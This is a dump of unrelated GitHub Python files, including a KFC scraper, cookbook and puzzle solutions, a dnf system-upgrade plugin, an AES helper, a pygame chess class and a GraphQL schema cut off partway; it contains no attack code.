+{"seq_id":"3628973311","text":"import requests\r\nimport json\r\nif __name__==\"__main__\":\r\n    post_url = 'http://www.kfc.com.cn/'\r\n    headers = {\r\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'\r\n    }\r\n    city = input('Enter a city: ')\r\n    data = {\r\n        'cname':'',\r\n        'pid':'',\r\n        'keyword': city,\r\n        'pageIndex':'1',\r\n        'pageSize':'40'\r\n    }\r\n    response = requests.get(url=post_url,data=data,headers=headers)\r\n    json_data = response.json()\r\n    with open('./{}.json'.format(city),'w',encoding='utf-8') as fp:\r\n        json.dump(json_data,fp,ensure_ascii=False)\r\n    print(\"Query finished!!\")","repo_name":"zhoujian-111/PYTHON","sub_path":"ZHOU/python爬虫/肯德基餐厅信息.py","file_name":"肯德基餐厅信息.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"14774245954","text":"\"\"\"\nProblem\nYou want to perform the same operation on many objects, but the objects are held in different containers, and you would like to avoid writing duplicated loops without losing readability.\nSolution\nThe itertools.chain() method can be used to simplify this task. It takes a list of iterables as input and returns an iterator that effectively hides the details of iterating over several containers. To illustrate, consider the following example:\n\"\"\"\n\nfrom itertools import chain\na = [1, 2, 3, 4]\nb = ['x', 'y', 'z']\n\nfor x in chain(a, b):\n    print(x)\n\n# itertools.chain() accepts one or more iterables as input arguments. It then creates an iterator that successively returns the elements of each iterable in turn.\n","repo_name":"ayumi64/Python_Cookbook_Learn","sub_path":"Section04 迭代器与生成器/4.12 不同集合上元素的迭代.py","file_name":"4.12 不同集合上元素的迭代.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"7319927594","text":"import requests\n\nSHEETY_PRICES_ENDPOINT = \"https://api.sheety.co/a1ce99ba2602220bd65c82a7dd0ac763/flightDeals/prices\"\n\n\nclass DataManager:\n    def __init__(self):\n        self.sheet_data = {}\n\n    # Reading data from Sheet\n    def read_sheet(self):\n        sheet_response = requests.get(url=SHEETY_PRICES_ENDPOINT)\n        data = sheet_response.json()\n        self.sheet_data = data[\"prices\"]\n        return self.sheet_data\n\n    # Update data to Sheet\n    def update_sheet(self):\n        for city in self.sheet_data:\n            new_data = {\n                \"price\": {\n                    \"iataCode\": city[\"iataCode\"]\n                }\n            }\n            sheet_response = requests.put(\n                url=f\"{SHEETY_PRICES_ENDPOINT}/{city['id']}\",\n                json=new_data\n            )\n            # 
print(sheet_response.text)\n","repo_name":"skateryash/100-Days-Of-Code-Challenge","sub_path":"Day 39/flight-deals-start/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"4616999552","text":"import openpyxl\nimport gol\nimport re\nimport string\n\n\n\ndef checkfile (filename, strcheck):\n\n    if '~' in filename:\n        return\n\n    wb = openpyxl.load_workbook(filename)\n    # get all the sheets in the workbook\n    sheets = wb.sheetnames\n\n    print(filename)\n\n    # loop over every sheet\n    for i in range(len(sheets)):\n        sheet = wb[sheets[i]]\n        if sheet.title == \"Test Steps\" or sheet.title == \"Test Overview\":\n            #print('\\n\\nsheet No.' + str(i + 1) + ': ' + sheet.title + '->>>')\n            for r in range(1, sheet.max_row + 1):\n                for c in range(1, sheet.max_column + 1):\n                    #if (string.find(str(sheet.cell(row=r, column=c).value), \"PM\") )!= -1:\n                    ret = re.findall(strcheck,str(sheet.cell(row=r, column=c).value),flags=re.IGNORECASE)\n                    if ret:\n                        gol.foundstr = \"........................ Found Wanted String ..............................\"\n                        #print(\"\\n find \" + strcheck + \" in row\" + str(r) + \" of \" + filename)\n#                        found_data = [filename,str(r),str(c),ret]\n                        found_data = [filename,str(r),str(c),ret,wb[sheets[0]].cell(row=5, column=2).value]\n                        gol.a.append(found_data)\n                        gol.csv_write.writerow(found_data)\n#                        gol.csv_write.writerow([gol.foundstr])\n#            else:\n#                gol.csv_write.writerow([gol.foundstr])\n\n\n\n\n#checkedfile = \"t.xlsm\"\n#needstr = \"PM\"\n#checkfile(checkedfile, needstr)","repo_name":"crosszhang/SpeckCheck","sub_path":"testxl.py","file_name":"testxl.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"33123405767","text":"import os\n\nfrom unittest import TestCase\nfrom webtest import TestApp\nfrom pecan import load_app\nfrom mock import patch\n\nfrom managesf.tests import dummy_conf\n\n\nclass V2FunctionalTest(TestCase):\n    def setUp(self):\n        c = dummy_conf()\n        self.config = {'services': c.services,\n                       'gerrit': c.gerrit,\n                       'app': c.app,\n                       'admin': c.admin,\n                       'sqlalchemy': c.sqlalchemy,\n                       'managesf': c.managesf,\n                       'policy': c.policy,\n                       'resources': c.resources,\n                       'api': c.api, }\n        # App must be loaded before we can import v2 managers\n        self.app = TestApp(load_app(self.config))\n\n    def tearDown(self):\n        # Remove the sqlite db\n        os.unlink(self.config['sqlalchemy']['url'][len('sqlite:///'):])\n\n\nclass TestManageSFV2ResourcesController(V2FunctionalTest):\n\n    @patch('managesf.controllers.api.v2.resources.manager')\n    def test_get_resources(self, rm):\n        with patch('managesf.controllers.api.v2.base.authorize'):\n            environ = {'REMOTE_USER': 'user'}\n            # not the real response format, but sufficient for this test\n            retval = {'skipped': 0,\n                      'total': 10,\n                      'limit': 1,\n                      'results': ['yo yo']}\n            rm.resources.get.return_value = retval\n            response = self.app.get('/v2/resources/',\n                                    extra_environ=environ, status=\"*\")\n            self.assertEqual(response.status_int, 200, response.text)\n            self.assertEqual('yo yo', response.json['results'][0])\n            # check specific args\n            response = self.app.get('/v2/resources/'\n                                    '?get_missing_resources=true',\n                                    extra_environ=environ, status=\"*\")\n            self.assertEqual(response.status_int, 200, response.text)\n            _, kwargs = rm.resources.get.call_args\n            self.assertEqual(True,\n                             kwargs.get('get_missing_resources'),\n                             kwargs)\n\n    
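# The same pattern (patch the v2 manager, fake REMOTE_USER through extra_environ)\n    # keeps every test in this class off the real backend; a hypothetical reuse:\n    #   rm.resources.get.return_value = {'results': []}\n    #   self.app.get('/v2/resources/?provider=x', extra_environ=environ)\n\n    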
@patch('managesf.controllers.api.v2.resources.manager')\n def test_validate_resources(self, rm):\n with patch('managesf.controllers.api.v2.base.authorize'):\n environ = {'REMOTE_USER': 'user'}\n # not the real format of the answer here but who cares, it's a test\n retval = True, 'yo yo'\n rm.resources.create.return_value = retval\n response = self.app.post('/v2/resources/',\n extra_environ=environ, status=\"*\")\n self.assertEqual(response.status_int, 200, response.text)\n self.assertEqual('yo yo', response.json)\n","repo_name":"softwarefactory-project/managesf","sub_path":"managesf/tests/apiv2/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12844921465","text":"import time \n\nproblem_number = 8\ntest_input = 4\ntest_solution = 5832 \nproblem_input = 13\n\n\n#Solution\n\n\nnumber_file = open(\"data.txt\", \"r\")\nraw_number = number_file.read()\nnumber_file.close()\n\ndef solution(string_number, limit):\n length = len(string_number)\n highest_count = 0\n \n for begin_index in range(length-limit):\n count = 1\n for sub_index in range(limit):\n count *= int(string_number[begin_index+sub_index])\n if count > highest_count:\n highest_count = count\n \n return highest_count\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution(raw_number, test_input)\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Input: \"+str(test_input)+\"\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n string += \"TRUE\"\nelse:\n string += \"FALSE\"\n \n\nbegin_problem = time.time()\nproblem_value = solution(raw_number, problem_input)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM #\"+str(problem_number)+\"\\n\\n\"\nstring += \"Input: \"+str(problem_input)+\"\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/8-Problem/Problem 8.py","file_name":"Problem 8.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40241783119","text":"import os\nimport json\n\nfrom argparse import ArgumentParser\nfrom subprocess import call\n\nimport dnf\nimport dnf.cli\nfrom dnf.i18n import _\n\nimport logging\nlog = logging.getLogger(\"dnf.plugin.fedup\")\n\n\nPLYMOUTH = '/usr/bin/plymouth'\nDEFAULT_DATADIR = '/var/lib/fedup'\nMAGIC_SYMLINK = '/system-update'\nSYSTEMD_FLAG_FILE = '/system-update/.dnf-fedup2-upgrade'\n\nNO_KERNEL_MSG = _(\"No new kernel packages were found.\")\nRELEASEVER_MSG = _(\"Need a --releasever greater than the current system version.\")\nDOWNLOAD_FINISHED_MSG = _(\"Download complete! 
Use 'dnf %s reboot' to start the upgrade.\")\n\n\ndef reboot():\n call([\"systemctl\", \"reboot\"])\n\n# Plymouth helper class + singleton object\nclass _PlymouthOutput(object):\n def __init__(self):\n self._last_args = dict()\n self.alive = None\n\n def _plymouth(self, cmd, *args):\n if cmd == '--ping' or args != self._last_args.get(cmd):\n self.alive = (call([PLYMOUTH, cmd] + args) == 0)\n self._last_args[cmd] = args\n return self.alive\n\n def ping(self):\n return self._plymouth(\"--ping\")\n\n def message(self, msg):\n return self._plymouth(\"display-message\", \"--text\", msg)\n\n def set_mode(self, mode):\n return self._plymouth(\"change-mode\", \"--\"+mode)\n\n def progress(self, percent):\n return self._plymouth(\"system-update\", \"--progress\", str(percent))\nPlymouth = _PlymouthOutput()\n\n\n# A couple checkXXX() functions in the style of dnf.cli.command.check*\ndef checkReleaseVer(conf):\n if dnf.rpm.detect_releasever(conf.installroot) == conf.releasever:\n raise dnf.cli.CliError(RELEASEVER_MSG)\n\ndef checkDataDir(datadir):\n if os.path.exists(datadir) and not os.path.isdir(datadir):\n raise dnf.cli.CliError(_(\"--datadir: File exists\"))\n\n\n# Holds the state of the upgrade between runs of the command.\n# Would be nice if dnf.Base provided access to its persistor, but oh well\nclass State(object):\n statefile = '/var/lib/fedup/upgrade.state'\n def __init__(self):\n self._data = {}\n self._read()\n\n # helper function for creating the properties on the State object\n def _prop(section, option): # pylint: disable=no-self-argument\n # pylint: disable=protected-access\n def setprop(self, value):\n self._data.setdefault(section,{})[option] = value\n def getprop(self):\n return self._data.setdefault(section,{}).get(option)\n return property(getprop, setprop)\n\n def _read(self):\n try:\n self._data = json.load(open(self.statefile))\n except IOError:\n self._data = {}\n\n def write(self):\n dnf.util.ensure_dir(os.path.dirname(self.statefile))\n with open(self.statefile, 'w') as outf:\n json.dump(self._data, outf)\n\n def clear(self):\n if os.path.exists(self.statefile):\n os.unlink(self.statefile)\n self._read()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type is None:\n self.write()\n\n download_status = _prop(\"download\", \"status\")\n datadir = _prop(\"download\", \"datadir\")\n\n upgrade_status = _prop(\"upgrade\", \"status\")\n releasever = _prop(\"upgrade\", \"releasever\")\n distro_sync = _prop(\"upgrade\", \"distro-sync\")\n allow_erasing = _prop(\"upgrade\", \"allowerasing\")\n best = _prop(\"upgrade\", \"best\")\n\n\n# This idea was borrowed from dnf-plugins-core!\nclass PluginArgumentParser(ArgumentParser):\n def __init__(self, cmd, **kwargs):\n prog='dnf %s' % cmd\n ArgumentParser.__init__(self, prog=prog, add_help=False, **kwargs)\n def error(self, message):\n raise AttributeError(message)\n def parse_known_args(self, args=None, namespace=None):\n try:\n return ArgumentParser.parse_known_args(self, args, namespace)\n except AttributeError as e:\n self.print_help()\n raise dnf.exceptions.Error(str(e))\n\n# DNF-API-TODO: need a way to let a Command override the display object\n# that gets passed to do_transaction() so that the upgrade can talk to plymouth\nclass PlymouthTransactionDisplay(dnf.cli.output.CliTransactionDisplay):\n def __init__(self):\n super(PlymouthTransactionDisplay, self).__init__()\n self.current = 0\n self.total = 0\n\n def event(self, package, action, te_cur, te_total, ts_cur, ts_total):\n 
super(PlymouthTransactionDisplay, self).event(package,\n action, te_cur, te_total, ts_cur, ts_total)\n\n if Plymouth.alive and action in self.action:\n self._update_plymouth(action, package, ts_cur, ts_total)\n\n def _update_plymouth(self, action, package, current, total):\n if current == self.current and total == self.total:\n return\n (self.current, self.total) = (current, total)\n Plymouth.progress(int(100.0 * current / total))\n Plymouth.message(\"[%d/%d] %s %s...\" % (\n current, total, self.action.get(action), package))\n\n# The plugin object that registers the command\nclass FedupPlugin(dnf.Plugin):\n name = 'fedup2'\n def __init__(self, base, cli):\n super(FedupPlugin, self).__init__(base, cli)\n self.conf = None\n self.base = base\n if cli:\n cli.register_command(FedupCommand)\n\n# Here's the big Command class. This is where the action is!! WHEEEE!!\nclass FedupCommand(dnf.cli.Command):\n # pylint: disable=unused-argument\n aliases = ('fedup2','fedup','system-upgrade')\n summary = _(\"Prepare system for upgrade to a new release\")\n usage = \"[%s] [download --releasever=%s|reboot|clean]\" % (\n _(\"OPTIONS\"), _(\"VERSION\")\n )\n\n def __init__(self, cli):\n super(FedupCommand, self).__init__(cli)\n self.opts = None\n self.state = State()\n\n def parse_args(self, extargs):\n p = PluginArgumentParser(self.aliases[0])\n p.add_argument('--distro-sync', default=False, action='store_true',\n help=_(\"downgrade packages if the new release's version is older\"))\n p.add_argument('--datadir', default=DEFAULT_DATADIR,\n help=_(\"save downloaded data to this location\"))\n p.add_argument('action',\n choices=('download','clean','reboot','upgrade'),\n help=_(\"action to perform\"))\n\n opts, dummy = p.parse_known_args(extargs)\n\n if not opts.action:\n dnf.cli.commands.err_mini_usage(self.cli, self.cli.base.basecmd)\n raise dnf.cli.CliError\n\n return opts\n\n # Call sub-functions (like configure_download()) for each possible action.\n # (this tidies things up quite a bit.)\n def configure(self, args):\n self.opts = self.parse_args(args)\n self._call_sub(\"configure\", args)\n def doCheck(self, basecmd, extcmds):\n self._call_sub(\"check\", basecmd, extcmds)\n def run(self, extcmds):\n self._call_sub(\"run\", extcmds)\n def run_transaction(self):\n self._call_sub(\"transaction\")\n def _call_sub(self, name, *args):\n subfunc = getattr(self, name+'_'+self.opts.action, None)\n if callable(subfunc):\n subfunc(*args)\n\n # == configure_*: set up action-specific demands ==========================\n\n def configure_download(self, args):\n self.cli.demands.root_user = True\n self.cli.demands.resolving = True\n self.cli.demands.available_repos = True\n self.cli.demands.sack_activation = True\n self.base.repos.all().pkgdir = self.opts.datadir\n # ...don't actually install anything now, though!\n self.base.conf.tsflags.append(\"test\")\n\n def configure_reboot(self, args):\n self.cli.demands.root_user = True\n\n def configure_upgrade(self, args):\n # same as the download, but offline and non-interactive. 
so..\n self.cli.demands.root_user = True\n self.cli.demands.resolving = True\n self.cli.demands.available_repos = True\n self.cli.demands.sack_activation = True\n # use the saved values for --datadir, --best, --allowerasing\n self.base.repos.all().pkgdir = self.state.datadir\n self.base.conf.best = self.state.best\n self.cli.demands.allow_erasing = self.state.allow_erasing\n # don't try to get new metadata, 'cuz we're offline\n self.cli.demands.cacheonly = True\n # and don't ask any questions (we confirmed all this beforehand)\n self.base.conf.assumeyes = True\n\n def configure_clean(self, args):\n self.cli.demands.root_user = True\n\n # == check_*: do any action-specific checks ===============================\n\n def check_download(self, basecmd, extargs):\n dnf.cli.commands.checkGPGKey(self.base, self.cli)\n dnf.cli.commands.checkEnabledRepo(self.base)\n checkReleaseVer(self.base.conf)\n checkDataDir(self.opts.datadir)\n\n def check_reboot(self, basecmd, extargs):\n if not self.state.download_status == 'complete':\n raise dnf.cli.CliError(_(\"system is not ready for upgrade\"))\n\n def check_upgrade(self, basecmd, extargs):\n if not self.state.upgrade_status == 'ready':\n raise dnf.cli.CliError(_(\"use '%s reboot' to begin the upgrade\") % basecmd)\n\n # == run_*: run the action/prep the transaction ===========================\n\n def run_reboot(self, extcmds):\n # make the magic symlink\n os.symlink(self.state.datadir, MAGIC_SYMLINK)\n # write releasever into the flag file so it can be read by systemd\n with open(SYSTEMD_FLAG_FILE, 'w') as flagfile:\n flagfile.write(\"RELEASEVER=%s\\n\" % self.state.releasever)\n # set upgrade_status so that the upgrade can run\n with self.state:\n self.state.upgrade_status = 'ready'\n reboot()\n\n def run_download(self, extcmds):\n # Mark everything in the world for upgrade/sync\n if self.opts.distro_sync:\n self.base.distro_sync()\n else:\n self.base.upgrade_all()\n\n if self.opts.datadir == DEFAULT_DATADIR:\n dnf.util.ensure_dir(self.opts.datadir)\n\n with self.state:\n self.state.download_status = 'downloading'\n self.state.datadir = self.opts.datadir\n\n def run_upgrade(self, extcmds):\n # Delete symlink ASAP to avoid reboot loops\n os.unlink(MAGIC_SYMLINK)\n # change the upgrade status (so we can detect crashed upgrades later)\n with self.state:\n self.state.upgrade_status = 'incomplete'\n # reset the splash mode and let the user know we're running\n Plymouth.set_mode(\"updates\")\n Plymouth.progress(0)\n Plymouth.message(_(\"Starting system upgrade. This will take a while.\"))\n # set up the upgrade transaction\n if self.state.distro_sync:\n self.base.distro_sync()\n else:\n self.base.upgrade_all()\n\n def run_clean(self, extcmds):\n if self.state.datadir:\n log.info(_(\"Cleaning up downloaded data...\"))\n dnf.util.clear_dir(self.state.datadir)\n self.state.clear()\n\n # == transaction_*: do stuff after a successful transaction ===============\n\n def transaction_download(self):\n # sanity check: we got a kernel, right?\n downloads = self.cli.base.transaction.install_set\n if not any(p.name.startswith('kernel') for p in downloads):\n raise dnf.exceptions.Error(NO_KERNEL_MSG)\n # Okay! 
Write out the state so the upgrade can use it.\n with self.state:\n self.state.download_status = 'complete'\n self.state.distro_sync = self.opts.distro_sync\n self.state.best = self.base.conf.best\n self.state.allow_erasing = self.cli.demands.allow_erasing\n self.state.releasever = self.base.conf.releasever\n log.info(DOWNLOAD_FINISHED_MSG, self.base.basecmd)\n\n def transaction_upgrade(self):\n Plymouth.message(_(\"Upgrade complete! Cleaning up and rebooting...\"))\n self.run_clean([])\n reboot()\n","repo_name":"wgwoods/fedup2","sub_path":"plugins/fedup2.py","file_name":"fedup2.py","file_ext":"py","file_size_in_byte":11991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41317150969","text":"import base64\r\nimport json\r\nfrom binascii import b2a_hex, a2b_hex\r\nfrom Crypto.Cipher import AES\r\n\r\n'''\r\n采用AES对称加密算法\r\n'''\r\n\r\n\r\n# # str不是32的倍数那就补足为16的倍数\r\n# def add_to_32(value):\r\n# while len(value) % 32 != 0:\r\n# value += '\\0'\r\n# return str.encode(value) # 返回bytes\r\n#\r\n#\r\ndef add_to_16(value):\r\n while len(value) % 16 != 0:\r\n value += '\\0'\r\n return str.encode(value) # 返回bytes\r\n\r\n\r\n\r\n\r\n\r\n#添加补码PKCS5Padding AES加密\r\ndef AES_encrypt(secret_key,data):\r\n \"\"\"\r\n :param secret_key [str] : 加密秘钥\r\n :param data [str] : 需要加密数据\r\n :return [str] :\r\n \"\"\"\r\n print(data,secret_key)\r\n # jsoncode = json.dumps(data).replace(\"(\", \"\").replace(\")\", \"\").replace(\" \", \"\")\r\n # print(jsoncode)\r\n BLOCK_SIZE = 16 # Bytes\r\n # 数据进行 PKCS5Padding 的填充\r\n pad = lambda s: (s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE))\r\n raw = pad(str(data))\r\n # 通过key值,使用ECB模式进行加密\r\n cipher = AES.new(secret_key.encode(), AES.MODE_ECB)\r\n\r\n # 得到加密后的字节码\r\n encrypted_text = cipher.encrypt(bytes(raw, encoding='utf-8'))\r\n # 字节码转换成base64 再转成 字符串 去掉换行符\r\n encrypted_text_hex = str(base64.encodebytes(encrypted_text), encoding='utf-8').replace(\"\\n\",\"\")\r\n print(encrypted_text_hex)\r\n return encrypted_text_hex\r\n\r\n#解码\r\ndef AES_decrypt(secret_key,encrypted_text_hex):\r\n \"\"\"\r\n :param secret_key [str] : 加密秘钥\r\n :param encrypted_text_hex [str]: # 加密后的 data 字符串\r\n :return [str]:\r\n \"\"\"\r\n # 去掉 PKCS5Padding 的填充\r\n unpad = lambda s: s[:-ord(s[len(s) - 1:])]\r\n # 通过 key 值进行\r\n cipher = AES.new(secret_key.encode(), AES.MODE_ECB)\r\n\r\n base64_decrypted = base64.decodebytes(encrypted_text_hex.encode(encoding='utf-8'))\r\n\r\n data_response = unpad(cipher.decrypt(base64_decrypted).decode('utf-8')).rstrip(\"\\0\")\r\n #print(data_response)\r\n return data_response\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n key = \"ehJzGST0D8Ne6adg\"\r\n\r\n\r\n\r\n jsonText = {\"apiKey\":\"93960537348\",\"apiSecret\":\"ehJzGST0D8Ne6adg\"}\r\n\r\n\r\n #jsoncode = json.dumps(jsonText).replace(\"(\",\"\").replace(\")\",\"\").replace(\" \",\"\")\r\n #print(jsoncode)\r\n\r\n encrytext = AES_encrypt(key,jsonText)\r\n\r\n AES_decrypt(key,encrytext)\r\n","repo_name":"zzr999zzr/PythonWorkSpace","sub_path":"AesEncryption.py","file_name":"AesEncryption.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43037984408","text":"# Задайте число. 
Составьте список чисел Фибоначчи,\r\n# в том числе для отрицательных индексов.\r\n#\r\n# Пример:\r\n# # - для k = 8 список будет выглядеть так:\r\n# [-21 ,13, -8, 5, −3, 2, −1, 1, 0, 1, 1, 2, 3, 5, 8, 13, 21]\r\n\r\nnum_us = int(input('Введите число k: '))\r\n\r\nlist_b = []\r\n\r\nfor i in range(num_us + 1):\r\n list_b.append(i)\r\n if i >= 2:\r\n list_b[i] = list_b[i - 1] + list_b[i - 2]\r\n\r\n\r\nlist_a = []\r\n\r\nfor j in range(num_us+1):\r\n list_a.append(j)\r\n list_a[j] = (-1)**(j + 1) * list_b[j]\r\n\r\nlist_a.pop(0)\r\nlist_a.reverse()\r\n\r\nlist_c = [*list_a, *list_b]\r\n\r\nprint(list_c)\r\n\r\n\r\n\r\n","repo_name":"GrebVl/python_lesson_03","sub_path":"task_05.py","file_name":"task_05.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5904506265","text":"from drscm.models import WorkSession\nfrom datetime import timedelta\nfrom drscm.interfaces.billable import Billable\nfrom utils.date import (\n timestamp_to_date_string,\n seconds_to_hours,\n time_stamp_to_date_time,\n seconds_to_hours_minutes_and_seconds,\n purify_timestamp,\n)\n\n\nclass WorkSessionProxy(WorkSession, Billable):\n\n start_date_string: str\n end_date_string: str\n session_duration_in_seconds: float\n session_duration: timedelta\n\n class Meta:\n proxy = True\n\n def __init__(self, *args, **kwargs):\n super(WorkSessionProxy, self).__init__(*args, **kwargs)\n self.start_date_string = timestamp_to_date_string(self.start_timestamp, \"%H:%M\")\n self.end_date_string = timestamp_to_date_string(self.end_timestamp, \"%H:%M\")\n pure_start_timestamp = purify_timestamp(self.start_timestamp)\n pure_end_timestamp = purify_timestamp(self.end_timestamp)\n self.session_duration = time_stamp_to_date_time(\n pure_end_timestamp\n ) - time_stamp_to_date_time(pure_start_timestamp)\n\n def get_date_string(self):\n date_string = timestamp_to_date_string(self.start_timestamp)\n return date_string\n\n def get_session_duration_date_string(self):\n hours, minutes, seconds = seconds_to_hours_minutes_and_seconds(\n self.session_duration.seconds\n )\n return f\"{hours:02}:{minutes:02}\"\n\n def get_session_duration_in_hours(self):\n return round(seconds_to_hours(self.session_duration.seconds), 2)\n\n def get_total(self):\n return round(self.project.hourly_rate * self.get_session_duration_in_hours(), 2)\n","repo_name":"shtlrs/WEB-DRSCM","sub_path":"drscm/proxies/work_sessions.py","file_name":"work_sessions.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28484000244","text":"# https://leetcode.com/problems/heaters/description/\n\nclass Solution:\n def findRadius(self, houses: List[int], heaters: List[int]) -> int:\n def canCover(radius):\n ranges = [[heater - radius, heater + radius] for heater in heaters]\n cur = 0\n \n for house in houses:\n while cur < len(ranges) and (house < ranges[cur][0] or house > ranges[cur][1]):\n cur += 1\n \n if cur >= len(ranges) or house < ranges[cur][0] or house > ranges[cur][1]:\n return False\n \n return True\n \n houses.sort()\n heaters.sort()\n left, right = 0, pow(10, 9)\n best = right\n \n while left <= right:\n mid = (left + right) // 2\n if canCover(mid):\n best = mid\n right = mid - 1\n else:\n left = mid + 1\n \n return best\n 
\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_51/heaters.py","file_name":"heaters.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74137973351","text":"import pygame\n\nfrom const import *\nfrom board import Board\nfrom dragger import Dragger\n\nclass Game:\n def __init__(self):\n self.next_turn = 'white'\n self.board = Board()\n self.dragger = Dragger(self)\n \n def show_bg(self, surface):\n for row in range(ROWS):\n for col in range(COLS):\n if (row + col) % 2 == 0:\n color = (234, 235, 200) # light green\n else:\n color = (119, 154, 88) # dark green\n \n rect = (col * SQSIZE, row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n \n def show_pieces(self, surface):\n for row in range(ROWS):\n for col in range(COLS):\n if self.board.squares[row][col].has_piece():\n piece = self.board.squares[row][col].piece\n\n if piece is not self.dragger.piece:\n piece.set_texture(size=80)\n img = pygame.image.load(piece.texture)\n img_center = (col * SQSIZE + SQSIZE // 2, row * SQSIZE + SQSIZE // 2)\n piece.texture_rect = img.get_rect(center=img_center)\n surface.blit(img, piece.texture_rect)\n \n def show_moves(self, surface):\n if self.dragger.dragging:\n piece = self.dragger.piece\n\n for move in piece.moves:\n color = '#fabf5a' if (move.final.row + move.final.col) % 2 != 0 else '#f7d078'\n rect = (move.final.col * SQSIZE, move.final.row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n\n def show_last_move(self, surface):\n if self.board.last_move:\n initial = self.board.last_move.initial\n final = self.board.last_move.final\n \n for pos in [initial, final]:\n color = '#fabf5a' if (pos.row + pos.col) % 2 != 0 else '#f7d078'\n rect = (pos.col * SQSIZE, pos.row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n \n def switch_turn(self):\n self.next_turn = 'black' if self.next_turn == 'white' else 'white'\n\n def reset(self):\n self.__init__()","repo_name":"bryanmccarthy/chess","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73697765354","text":"import os\n\nimport strawberry\nfrom fastapi import Request, Response\nfrom graphql import ExecutionResult as GraphQLExecutionResult\nfrom graphql import GraphQLError\nfrom strawberry.extensions import SchemaExtension\nfrom strawberry.scalars import JSON\nfrom strawberry.schema.config import StrawberryConfig\nfrom strawberry.types import Info\n\nfrom .connections import get_redis_connection\nfrom .database import (\n get_viz_data,\n ingest_project,\n project_exists,\n query_projects,\n query_usage_by_datetimes,\n verify_token,\n)\nfrom .fetchers import fetch_project_info\nfrom .models import get_project_tables\nfrom .types import (\n AuthenticationResult,\n Context,\n DateTime,\n Process,\n Project,\n ProjectInput,\n)\nfrom .utils import now\n\n\n@strawberry.type\nclass Query:\n @strawberry.field\n async def get_projects(self) -> list[str]:\n '''Return projects that are being tracked'''\n projs = await query_projects()\n return projs\n\n @strawberry.field\n async def get_usage(\n self,\n project: str,\n start: DateTime,\n end: DateTime = None,\n unique: bool = False,\n ) -> JSON:\n '''\n Query project uses.\n\n `start` and `end` can be in either of the following formats:\n - `YYYY-MM-DD`\n - `YYYY-MM-DDTHH:MM:SSZ'\n\n If `endtime` is 
not provided, current time is used.\n If `unique`, only unique users will be included.\n '''\n\n if end is None:\n end = now()\n exists = await project_exists(project)\n if not exists:\n count = 0\n message = f'Project \"{project}\" is not being tracked'\n else:\n project_table, _ = await get_project_tables(project, create=False)\n count = await query_usage_by_datetimes(project_table, start, end, unique)\n message = ''\n return {\n 'hits': count,\n 'message': message,\n 'unique': unique,\n 'success': exists,\n }\n\n @strawberry.field\n async def login(token: str) -> AuthenticationResult:\n valid, projects = await verify_token(token)\n if not valid:\n msg = 'Authentication Error: token is either invalid or expired.'\n else:\n msg = 'Authentication successful.'\n return AuthenticationResult(\n token=token,\n projects=projects,\n message=msg,\n )\n\n @strawberry.field\n async def usage_stats(self, project: str, token: str) -> JSON:\n 'Generate different usage information'\n _, projects = await verify_token(token)\n if project not in projects:\n raise Exception('Invalid token.')\n return await get_viz_data(project)\n\n\n@strawberry.type\nclass Mutation:\n @strawberry.field\n async def add_project(self, p: ProjectInput, info: Info) -> JSON:\n # validate project\n if not p.project or '/' not in p.project:\n raise 